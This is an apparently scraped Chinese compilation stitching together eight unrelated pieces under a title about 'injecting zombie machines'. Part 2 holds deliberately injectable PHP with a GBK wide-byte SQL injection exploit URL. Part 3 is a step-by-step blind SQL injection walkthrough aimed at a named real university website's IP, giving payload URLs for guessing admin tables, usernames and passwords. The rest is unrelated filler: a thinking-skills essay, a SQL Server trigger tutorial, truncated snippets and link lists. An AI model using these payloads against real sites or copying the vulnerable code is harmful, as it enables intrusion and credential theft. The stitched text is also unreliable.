实例讲解如何注入肉鸡
“饭不好吃”通过精心收集,向本站投稿了8篇实例讲解如何注入肉鸡,以下是小编精心整理后的实例讲解如何注入肉鸡,供大家参考借鉴,希望可以帮助到有需要的朋友。
篇1:实例讲解如何注入肉鸡
获取注入点的方法不外乎两种:手工寻找和利用注入工具寻找,
实例讲解如何注入肉鸡
,
对于前者,多数是用搜索引擎来找特定的网址(形如xxx.asp?xxid=),对于后者,则是针对具体某个站点用注入工具扫描注入点。不过,你有没有考虑过把这两种方法结合起来使用呢?我就倾向于二者的组合使用
篇2:宽字节注入实例
02/*
03* code:c4bbage
04* From:cunlide.com
05*/
06error_reporting(E_ALL);
07$conn = mysql_connect(“localhost”,“root”,“toor”);
08mysql_query(“SET NAMES 'GBK'”);
09mysql_select_db(“test1”,$conn);
10$username=mysql_escape_string($_GET['username']);
11//$username= addslashes($_GET['username']);
12var_dump($username);
13$password=mysql_escape_string($_GET['password']);
14$sql= “select * from admin where username='$username' and password='$password'”;
15print_r($sql);echo “
”;
16$result = mysql_query($sql,$conn);
17print_r($result);echo “
”;
18while ($row=mysql_fetch_array($result,MYSQL_ASSOC))
19{
20print_r($row[]=$row);
21}
22/*
23exp:
24127.0.0.1/sqli.php?username=%bf'union select 1,2,3%23&password=password
25db file :
26--test1.sql
27SET SQL_MODE=“NO_AUTO_VALUE_ON_ZERO”;
28SET time_zone = “+00:00”;
29--gbk database
30CREATE DATABASE `test1` DEFAULT CHARACTER SET gbk COLLATE gbk_chinese_ci;
31USE `test1`;
32
33CREATE TABLE IF NOT EXISTS `admin` (
34`id` int(11) NOT NULL,
35`username` varchar(15) NOT NULL,
36`password` varchar(15) NOT NULL,
37PRIMARY KEY (`id`)
38) ENGINE=InnoDB DEFAULT CHARSET=gbk;
39
40INSERT INTO `admin` (`id`, `username`, `password`) VALUES
41(1, 'admin', 'password');
42
43*/
44?>
篇3:对一网站注入过程步骤的实例讲解
我都不知是什么时候写的了,这几天整理电脑时才翻出来,,看看思路吧,其它的没有什么价值,
========================================================
说明:还请注明作者:赛冰河
另外,为我这次过程分析更为真实,各读者更能较好地理解,故用真实IP分析
这次注入是真实的网站是:202.114.71.194/ 武汉大学环境法研究所,为此,望大家不要搞破坏,仅仅是为学习,如有什么意外的地方,概与本人无关。
========================================================
今天我主要是分分析的是SQL注入,但顺便也会对ACCESS的判断简单说说,并且提供一些网站安全
的建议。由于现在好多网站安上内容过滤的防火墙,然后编程人员稍加注意,另外管理员负责一点的话,我们是很难用这些漏洞的,还是那句话,只要防的时候你多动一下手的话, 可能也没有那么多的耐心在那你搞你了,唉,偏偏你就。。。。。。。。。
简单地说说注入,就是攻击者在IE中提交一些代码,而这些代码可能在加入查询时作为程序的一些语言的命令,就是加入后造成现在程序运行的与你原来的运行过程相背离,从而进行攻击。我这里今天讲的是SQL,所以你也得有一定的SQL语言的基础。另外就是要用到返回的错误的不同,而进行判断,所以你得把你的IE设定一下,工具--->Internet选项-->高级-->显示友好 HTTP错误信息前面的勾去掉。这样就会返回错误的提示了。
首先,可能大家也知,就是试试单引号’了。到202.114.71.194/的首页看一下吧,任意打开一个页面看看,我打开的是202.114.71.194/show.asp?ID=763' 返回的如下:
----------------------------------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the
character string ''.
/show.asp,行47
---------------------------------------------------------------------------------------
也许有人会说,你运气这样好,这个网站就能注入呀,呵呵,我是讲注入嘛,其实早就找到它有这个漏洞了的,今天为了给大家讲嘛就用它了-----------编程人员的一大失误
如果你搞另外的网站返回的是:
----------------------------------------------------------------------------------------
Microsoft JET Database Engine 错误 '80040e14'
字符串的语法错误 在查询表达式 'ID=56'' 中。
/showdetail.asp,行8
----------------------------------------------------------------------------------------
这就是ACCESS的数据库了。
同时这一步中我们一般还要试试下面两个:
202.114.71.194/show.asp?ID=763%20and%201=1
202.114.71.194/show.asp?ID=763%20and%201=2
这第句显然成立的,返回的是202.114.71.194/show.asp?ID=763一样的,而第二句当然不成立返回是没有这页面。(这里的%20要是菜鸟不知的话,我说说,就是空格嘛)
第二步,在第一步中我们知道了它是用的ASP+SQL的,我们当然就是要找找它的管理员的用户名与密码了,要找这,当然要找到他是把这用户名与密码放在什么表名中的。那如何知道表名呢,主要是看源文件,还有就是猜了,大多是有规则的。同时还要找找他的管理入口哟,有一切可能的手段去找吧
可以猜一下如longin.asp,admin.asp,ad_login.asp,等,我猜到这个网站的入口是:
202.114.71.194/login.asp 其实眼快的话,也可看看它们网站的主页上不是有个管理入口吗?
还不用你去猜了-------管理员的一大失误
在这一次中,我们还要找到他的管理员表放在什么表中,试一下
202.114.71.194/show.asp?ID=763%20and%20exists%20(select%20*%20from%20login)
在这你可以试一下把login换成user ,admin,等等猜一下,要是返回与这个页面是一样的话,那你就猜对了,
这个页面是202.114.71.194/show.asp?ID=763
第三步嘛,有了表名,当然就是猜表里的列了,一般这里是有3列吧,ID号,用户名,密码那就由下面的试了
202.114.71.194/show.asp?ID=763%20and%20exists%20(select%20id%20from%20login)
202.114.71.194/show.asp?ID=763%20and%20exists%20(select%20username%20from%20login)
202.114.71.194/show.asp?ID=763%20and%20exists%20(select%20password%20from%20login)
经过N次的提交,终于找到了(做 也不容易呀,干苦力活)
我试出里边的用户列为user ,密码列为 password.
第四步嘛,来猜一下这个表中的有哪些ID号是存在的了,语句是
202.114.71.194/show.asp?ID=763%20and%20exists%20(select%20id%20from%20login%20where%20id=1) 在这里你可以把这个ID=1换成ID=2,3,4,5.......试了
第五步,来猜用户名的长度了,
202.114.71.194/show.asp?ID=763and%20exists%20(select%20id%20from%20login%20where
%20len(user)=1%20and%20id=1)
这里要试的是len(username)=1 ,2,3,4......试到返回正确为止,这步较容易,最多试个10次左右吧我这次试出它的长度为7(当然我试的是ID=1的那个用户了)
第六步,来猜测它里边的用户名的各个组成字母了,呵,要不是字母,而是汉字可就惨了202.114.71.194/show.asp?ID=763%20exists%20
(select%20id%20from%20login%20where%20asc(mid(user,1,1))>110%20and%20id=1)
有时还可能用下边的来试
202.114.71.194/show.asp?ID=763%20exists%20
(select%20id%20from%20login%20where%20left(user,1)=a)
这里主要就是这样的试left(user,1)=a,b,c,d,........... 了
在这里,工作量可大着呢,我试了几个,就没有试了,好像这里能用一个程序实现的,只是我现在想不起在哪儿见过了,要是你在这里有更好的办法试的话,也请给我说说,教教我嘛,相互学习(呵呵,要是谁想要我这徒弟,我真是愿意)
最后一步,把USER换为password,把密码也搞出来了,,但我没有试出,还是工作量大,所以此文也就是简单介绍一下注入。
下面我就简单说一下,对此类问题一般如何防范了。
1、编程时把单引号等特殊符号过滤掉,同时可能的话,加上限定用户通过IE输入长度的控制这个可以由编程人员或都防火墙实现
2、管理员的事了,把管理入口改过没有规则的名字,加以隐藏掉,让攻击者找不到注入的地方特别是不要明目张胆的把管理入口放在主页,这不是明明白白的给攻击者说,来攻我这里吗 ?
3、可能的话,把管理入口那个页面删掉,这样虽然管理时是有点不方便,要用的时候再把把它传上去。这样就实现了没有入口。
好了,说了这么多,也应该算完了,要是文章中有什么不对的地方,希望你能够指出。
我的邮箱是anmeihong@sina.com 另外,就是本次文章中由于防读者就用去攻击这个网站,在其中
我有时把试出的正确结果换了一下的,还希望你不要搞破坏
篇4:实例讲解逻辑思维能力
我们学习时,表面看天天在和概念和原理打交道,实际上我们是在学习有关事物本质和规律的知识.
要想掌握事物的本质和规律,仅靠感觉、知觉、表象是不行的,需要在感觉和知觉的基础上,借助于思维才能完成.
人正是因为有能够进行思维活动的大脑,所以才能揭示事物的本质和规律,从而间接地、概括地、更加深刻地认识世界.
1869年人们已经掌握了63种元素的物理性质和化学性质,当时的化学家们都在考虑,元素的性质究竟和什么有关系?元素之间又有什么内在联系?
俄国化学家门捷列夫在这方面的工作是杰出的.他用厚纸片做了63个方形卡片.卡片上记录着元素的名称、性质和原子量,又通过反复的思考最后发现:元素的性质随着原子量的递增而呈周期性的变化.这就是门捷列夫发现的元素周期律.根据这个规律,他把自己已经知道的63种元素排列在一张表里,这张表就叫元素周期表.他还在表中留下空位,预言了某些未知元素的性质,还指出已测定过的元素原子量的错误,随着科学的发展,以后的科学事实证实了门捷列夫的预言.
由于受到当时科学技术水平的限制,门捷列夫没有发现元素性质周期性变化的根本原因是元素核电荷数(原子序数)的递增,或者说是核外电子排列的周期性变化.但门捷列夫这个伟大的发现,还是为人类进一步揭示元素性质和物质结构之间的关系开辟了道路.
门捷列夫的这种认识,是由于没有停留在对个别元素的认识上,而是以某一类事物的整体(63种元素)为研究对象,所以抓住了某一类事物的本质特征,发现了事物之间的内在联系.这种认识,只有通过大脑思维活动才能最终实现,不然是很难抓住事物的本质和规律的.
门捷列夫在回答彼得堡小报记者的提问时说:“这个问题我大约考虑了,而您却认为坐着不动,5个戈比(俄国货币单位)一行,5个戈比一行地写着,突然就成了.事情并不是这样!”“考虑了20年”,说明了长期而艰苦的思维活动在探索事物规律中的重大作用.
丹麦科学家第谷·布拉赫花了30年时间积累了行星运动的大量观察材料,但没有发现什么重要的规律.而他的学生,德国的刻卜勒在第谷的感性认识的基础上,终于发现了行星运动三定理,使感性认识上升为理性认识.这种认识的上升、飞跃靠什么呢?靠的是艰苦的思维活动.牛顿从刻卜勒的三定律的引力概念中,通过思维活动又发现了“万有引力定律”.一般人总认为牛顿是看到苹果落地,才偶然发现这个定律的,因此,把这棵树视为珍宝,树倒了以后还把树砍为若干段,妥为保管.事实上,万有引力定律的发现,是牛顿在多年观察和学习的过程中,经过艰苦思考的成果.他说:“我并没有什么方法,只是对一些问题用了很长的时间去思考罢了.”“我一直在思考、思考、思考……”这里,牛顿说出了他发明创造的两条秘诀:一要继承前人的科学成果,二要在研究中勤于思考.
可见,在创造发明的过程中,如果离开了思维活动,就无法揭示出事物的本质和规律,创造和发明也就成了空话.同样,在学习活动中也不能离开思维活动,否则就无法掌握事物的本质和规律,概念和原理也就无法建立起来.例如,在化学课上,经过一系列实验与观察,掌握了氢氧化钠和氢氧化钙的很多理化性质,然后,从不同的角度,通过分析、比较、抽象、概括等思维活动,去掉个别的非本质的特征,找出它们的本质特征,也就是决定该事物之所以成为该事物,并区别于其他事物的特有属性:电离时所生成的阴离子全部是氢氧根的电解质.把这种电解质称为“碱”,从而确立了“碱”的概念.
在生物课上,通过显微镜看到了口腔上皮细胞、洋葱表皮细胞、蕃茄果肉细胞、草履虫等,获得了大量的感性认识.通过思维活动,就会进一步发现:细胞形状虽然各式各样,但它们基本上都有细胞膜、细胞质和细胞核.以后进一步学习又知道,细胞通过分裂可以增殖,细胞是组成生物体的基本结构单位,也是生物体进行新陈代谢的基本功能单位.抓住了这些共同的、本质的特征,细胞的概念就初步建立起来了.
可以说,数学中的正数、负数、虚数、实数、微分、积分……,物理学中的质量、重量、速度、加速度、沸点、熔点、矢量……,化学中的化合、分解、氧化、还原、化合价、原子量、摩尔……,生物学中的同化、异化、光合作用、呼吸作用、遗传、变异、生长等等,这些概念的确立,要经历从个别到一般,从具体到抽象,从个性到共性,从感性认识到理性认识的飞跃过程,这个过程的实现,必须通过思维活动才能实现.
总之,思维活动使我们在学习活动中能继承人类的知识,并能运用知识来解决学习中的各种问题.离开了思维活动,感性认识就无法上升到理性认识,理性认识也无法指导实践活动.
正因为思维可以对现实的对象和现象做出概括的、间接的反映,所以恩格斯在《自然辩证法》的导言中,把思维着的心誉为“地球上最美的花朵”.
篇5:SQL触发器实例讲解
SQL触发器实例1
定义: 何为触发器?在SQL Server里面也就是对某一个表的一定的操作,触发某种条件,从而执行的一段程序,触发器是一个特殊的存储过程。
常见的触发器有三种:分别应用于Insert , Update , Delete 事件。
我为什么要使用触发器?比如,这么两个表:
复制代码代码如下:Create Table Student( --学生表
StudentID int primary key, --学号
....
)
Create Table BorrowRecord( --学生借书记录表
BorrowRecord int identity(1,1), --流水号
StudentID int , --学号
BorrowDate datetime, --借出时间
ReturnDAte Datetime, --归还时间
...
) 复制代码代码如下:
Create Trigger truStudent
On Student --在Student表中创建触发器
for Update --为什么事件触发
As --事件触发后所要做的事情
if Update(StudentID)
begin
Update BorrowRecord
Set StudentID=i.StudentID
From BorrowRecord br , Deleted d ,Inserted i --Deleted和Inserted临时表
Where br.StudentID=d.StudentID
end
理解触发器里面的两个临时的表:Deleted , Inserted 。注意Deleted 与Inserted分别表示触发事件的表“旧的一条记录”和“新的一条记录”。
一个数据库系统中有两个虚拟表用于存储在表中记录改动的信息,分别是:
虚拟表Inserted 虚拟表Deleted
在表记录新增时 存放新增的记录 不存储记录
修改时 存放用来更新的新记录 存放更新前的记录
删除时 不存储记录 存放被删除的记录
一个Update 的过程可以看作为:生成新的记录到Inserted表,复制旧的记录到Deleted表,然后删除Student记录并写入新纪录。
对于2,创建一个Delete触发器
复制代码代码如下:Create trigger trdStudent
On Student
for Delete
As
Delete BorrowRecord
From BorrowRecord br , Delted d
Where br.StudentID=d.StudentID
从这两个例子我们可以看到了触发器的关键:A.2个临时的表;B.触发机制。
SQL触发器实例2
复制代码代码如下:/*
建立虚拟测试环境,包含:表[卷烟库存表],表[卷烟销售表]。
请大家注意跟踪这两个表的数据,体会触发器到底执行了什么业务逻辑,对数据有什么影响。
为了能更清晰的表述触发器的作用,表结构存在数据冗余,且不符合第三范式,这里特此说明。
*/
USE Master
GO
IF EXISTS (SELECT NAME FROM SYSOBJECTS WHERE XTYPE = 'U' AND NAME = '卷烟库存表')
DROP TABLE 卷烟库存表
GO
IF EXISTS (SELECT NAME FROM SYSOBJECTS WHERE XTYPE = 'U' AND NAME = '卷烟销售表')
DROP TABLE 卷烟销售表
GO
--业务规则:销售金额 = 销售数量 * 销售单价 业务规则。
CREATE TABLE 卷烟销售表
(
卷烟品牌 VARCHAR(40) PRIMARY KEY NOT NULL,
购货商 VARCHAR(40) NULL,
销售数量 INT NULL,
销售单价 MONEY NULL,
销售金额 MONEY NULL
)
GO
--业务规则:库存金额 = 库存数量 * 库存单价 业务规则。
CREATE TABLE 卷烟库存表
(
卷烟品牌 VARCHAR(40) PRIMARY KEY NOT NULL,
库存数量 INT NULL,
库存单价 MONEY NULL,
库存金额 MONEY NULL
)
GO
--创建触发器,示例1
/*
创建触发器[T_INSERT_卷烟库存表],这个触发器较简单。
说明: 每当[卷烟库存表]发生 INSERT 动作,则引发该触发器。
触发器功能: 强制执行业务规则,保证插入的数据中,库存金额 = 库存数量 * 库存单价。
注意: [INSERTED]、[DELETED]为系统表,不可创建、修改、删除,但可以调用。
重要: 这两个系统表的结构同插入数据的表的结构。
*/
IF EXISTS (SELECT NAME FROM SYSOBJECTS WHERE XTYPE = 'TR' AND NAME = 'T_INSERT_卷烟库存表')
DROP TRIGGER T_INSERT_卷烟库存表
GO
CREATE TRIGGER T_INSERT_卷烟库存表
ON 卷烟库存表
FOR INSERT
AS
--提交事务处理
BEGIN TRANSACTION
--强制执行下列语句,保证业务规则
UPDATE 卷烟库存表
SET 库存金额 = 库存数量 * 库存单价
WHERE 卷烟品牌 IN (SELECT 卷烟品牌 from INSERTED)
COMMIT TRANSACTION
GO
/*
针对[卷烟库存表],插入测试数据:
注意,第一条数据(红塔山新势力)中的数据符合业务规则,
第二条数据(红塔山人为峰)中,[库存金额]空,不符合业务规则,
第三条数据(云南映像)中,[库存金额]不等于[库存数量]乘以[库存单价],不符合业务规则。
第四条数据库存数量为0。
请注意在插入数据后,检查[卷烟库存表]中的数据是否 库存金额 = 库存数量 * 库存单价。
*/
INSERT INTO 卷烟库存表(卷烟品牌,库存数量,库存单价,库存金额)
SELECT '红塔山新势力',100,12,1200 UNION ALL
SELECT '红塔山人为峰',100,22,NULL UNION ALL
SELECT '云南映像',100,60,500 UNION ALL
SELECT '玉溪',0,30,0
GO
--查询数据
SELECT * FROM 卷烟库存表
GO
/*
结果集
RecordId 卷烟品牌 库存数量 库存单价 库存金额
-------- ------------ -------- ------- ---------
1 红塔山新势力 100 12.0000 1200.0000
2 红塔山人为峰 100 22.0000 2200.0000
3 云南映像 100 60.0000 6000.0000
4 玉溪 0 30.0000 .0000
(所影响的行数为 4 行)
*/
--触发器示例2
/*
创建触发器[T_INSERT_卷烟销售表],该触发器较复杂。
说明: 每当[卷烟库存表]发生 INSERT 动作,则引发该触发器。
触发器功能: 实现业务规则。
业务规则: 如果销售的卷烟品牌不存在库存或者库存为零,则返回错误。
否则则自动减少[卷烟库存表]中对应品牌卷烟的库存数量和库存金额。
*/
IF EXISTS (SELECT NAME FROM SYSOBJECTS WHERE XTYPE = 'TR' AND NAME = 'T_INSERT_卷烟销售表')
DROP TRIGGER T_INSERT_卷烟销售表
GO
CREATE TRIGGER T_INSERT_卷烟销售表
ON 卷烟销售表
FOR INSERT
AS
BEGIN TRANSACTION
--检查数据的合法性:销售的卷烟是否有库存,或者库存是否大于零
IF NOT EXISTS (
SELECT 库存数量
FROM 卷烟库存表
WHERE 卷烟品牌 IN (SELECT 卷烟品牌 FROM INSERTED)
)
BEGIN
--返回错误提示
RAISERROR('错误!该卷烟不存在库存,不能销售,',16,1)
--回滚事务
ROLLBACK
RETURN
END
IF EXISTS (
SELECT 库存数量
FROM 卷烟库存表
WHERE 卷烟品牌 IN (SELECT 卷烟品牌 FROM INSERTED) AND
库存数量 <= 0
)
BEGIN
--返回错误提示
RAISERROR('错误!该卷烟库存小于等于0,不能销售。',16,1)
--回滚事务
ROLLBACK
RETURN
END
--对合法的数据进行处理
--强制执行下列语句,保证业务规则
UPDATE 卷烟销售表
SET 销售金额 = 销售数量 * 销售单价
WHERE 卷烟品牌 IN (SELECT 卷烟品牌 FROM INSERTED)
DECLARE @卷烟品牌 VARCHAR(40)
SET @卷烟品牌 = (SELECT 卷烟品牌 FROM INSERTED)
DECLARE @销售数量 MONEY
SET @销售数量 = (SELECT 销售数量 FROM INSERTED)
UPDATE 卷烟库存表
SET 库存数量 = 库存数量 - @销售数量,
库存金额 = (库存数量 - @销售数量)*库存单价
WHERE 卷烟品牌 = @卷烟品牌
COMMIT TRANSACTION
GO
--请大家自行跟踪[卷烟库存表]和[卷烟销售表]的数据变化。
--针对[卷烟销售表],插入第一条测试数据,该数据是正常的。
INSERT INTO 卷烟销售表(卷烟品牌,购货商,销售数量,销售单价,销售金额)
SELECT '红塔山新势力','某购货商',10,12,1200
GO
--针对[卷烟销售表],插入第二条测试数据,该数据 销售金额 不等于 销售单价 * 销售数量。
--触发器将自动更正数据,使 销售金额 等于 销售单价 * 销售数量。
INSERT INTO 卷烟销售表(卷烟品牌,购货商,销售数量,销售单价,销售金额)
SELECT '红塔山人为峰','某购货商',10,22,
GO
--针对[卷烟销售表],插入第三条测试数据,该数据中的卷烟品牌在 卷烟库存表中找不到对应。
--触发器将报错。
INSERT INTO 卷烟销售表(卷烟品牌,购货商,销售数量,销售单价,销售金额)
SELECT '红河V8','某购货商',10,60,600
GO
/*
结果集
服务器: 消息 50000,级别 16,状态 1,过程 T_INSERT_卷烟销售表,行 15
错误!该卷烟不存在库存,不能销售。
*/
--针对[卷烟销售表],插入第三条测试数据,该数据中的卷烟品牌在 卷烟库存表中库存为0。
--触发器将报错。
INSERT INTO 卷烟销售表(卷烟品牌,购货商,销售数量,销售单价,销售金额)
SELECT '玉溪','某购货商',10,30,300
GO
/*
结果集
服务器: 消息 50000,级别 16,状态 1,过程 T_INSERT_卷烟销售表,行 29
错误!该卷烟库存小于等于0,不能销售。
*/
--查询数据
SELECT * FROM 卷烟库存表
SELECT * FROM 卷烟销售表
GO
/*
补充:
1、本示例主要通过一个简单的业务规则实现来进行触发器使用的说明,具体的要根据需要灵活处理;
2、关于触发器要理解并运用好 INSERTED ,DELETED 两个系统表;
3、本示例创建的触发器都是 FOR INSERT ,具体的语法可参考:
Trigger语法
复制代码代码如下:CREATE TRIGGER trigger_name
ON { table | view }
[ WITH ENCRYPTION ] --用于加密触发器
{
{ { FOR | AFTER | INSTEAD OF } { [ INSERT ] [ , ] [ UPDATE ] }
[ WITH APPEND ]
[ NOT FOR REPLICATION ]
AS
[ { IF UPDATE ( column )
[ { AND | OR } UPDATE ( column ) ]
[ ...n ]
| IF ( COLUMNS_UPDATED ( ) { bitwise_operator } updated_bitmask )
{ comparison_operator } column_bitmask [ ...n ]
} ]
sql_statement [ ...n ]
}
}
4、关于触发器,还应该注意
(1)、DELETE 触发器不能捕获 TRUNCATE TABLE 语句。
(2)、触发器中不允许以下 Transact-SQL 语句:
ALTER DATABASE CREATE DATABASE DISK INIT
DISK RESIZE DROP DATABASE LOAD DATABASE
LOAD LOG RECONFIGURE RESTORE DATABASE
RESTORE LOG
(3)、触发器最多可以嵌套 32 层。
*/
--修改触发器
--实质上,是将 CREATE TRIGGER ... 修改为 ALTER TRIGGER ...即可。
--删除触发器
DROP TRIGGER xxx
GO
--删除测试环境
DROP TABLE 卷烟库存表
GO
DROP TABLE 卷烟销售表
GO
DROP TRIGGER T_INSERT_卷烟库存表
GO
DROP TRIGGER T_INSERT_卷烟销售表
GO
##################################################################
触发器的基础知识和例子
:create trigger tr_name
on table/view
{for | after | instead of } [update][,][insert][,][delete]
[with encryption]
as {batch | if update (col_name) [{and|or} update (col_name)] }
说明:
1 tr_name :触发器名称
2 on table/view :触发器所作用的表。一个触发器只能作用于一个表
3 for 和after :同义
4 after 与instead of :sql 2000新增项目afrer 与 instead of 的区别
After
在触发事件发生以后才被激活,只可以建立在表上
Instead of
代替了相应的触发事件而被执行,既可以建立在表上也可以建立在视图上
5 insert、update、delete:激活触发器的三种操作,可以同时执行,也可选其一
6 if update (col_name):表明所作的操作对指定列是否有影响,有影响,则激活触发器。此外,因为delete 操作只对行有影响,
所以如果使用delete操作就不能用这条语句了(虽然使用也不出错,但是不能激活触发器,没意义)。
7 触发器执行时用到的两个特殊表:deleted ,inserted
deleted 和inserted 可以说是一种特殊的临时表,是在进行激活触发器时由系统自动生成的,其结构与触发器作用的表结构是一
样的,只是存放 的数据有差异。
续
下面表格说明deleted 与inserted 数据的差异
deleted 与inserted 数据的差异
Inserted
存放进行insert和update 操作后的数据
Deleted
存放进行delete 和update操作前的数据
注意:update 操作相当于先进行delete 再进行insert ,所以在进行update操作时,修改前的数据拷贝一条到deleted 表中,修改后
的数据在存到触发器作用的表的同时,也同时生成一条拷贝到insered表中
篇6:实例讲解如何防止网络钓鱼
Judy Bodmer是美国一位知名作家,以下就是她的亲身经历,
实例讲解如何防止网络钓鱼
,
Judy Bodmer:最近,我收到一个朋友的邮件,他要求我更新我的联系资料。因为我认识他已经很久了,我毫不犹豫地照做了:登陆网站-填写表格-然后按下一步-刷新至下一页面。令我惊讶的是,我成为了Plaxo
篇7:copy命令由易到难实例讲解
copy作用是复制文件,中文含义为 复制 一个很容易见名知意的命令,
copy命令由易到难实例讲解
,
用法十分简单: copy源文件 目的路径。 需要把 d:\test\test.txt 这个文件复制到 D 盘根目录下,假设。那么,使用 copy d:\test\test.txt d:\ 就可以轻易办到 这是最简单的情形,当然。实际
篇8:python使用xmlrpc实例讲解
2013-11-11python连接MySQL、MongoDB、Redis、memcache等数据库的方法
2014-01-01python list转dict示例分享
2008-09-09Python isinstance判断对象类型
2013-12-12用python写asp详细讲解
2009-04-04合并Excel工作薄中成绩表的VBA代码,非常适合教育一线的朋友
2014-03-03python基础教程之简单入门说明(变量和控制语言使用方法)
2014-04-04python实现的二叉树算法和kmp算法实例
2014-01-01python检测lvs real server状态
2014-02-02用smtplib和email封装python发送邮件模块类分享
2014-03-03python单线程实现多个定时器示例
【实例讲解如何注入肉鸡】相关文章:
6.肉鸡饲养技术要点
8.肉鸡养殖个人总结
文档为doc格式
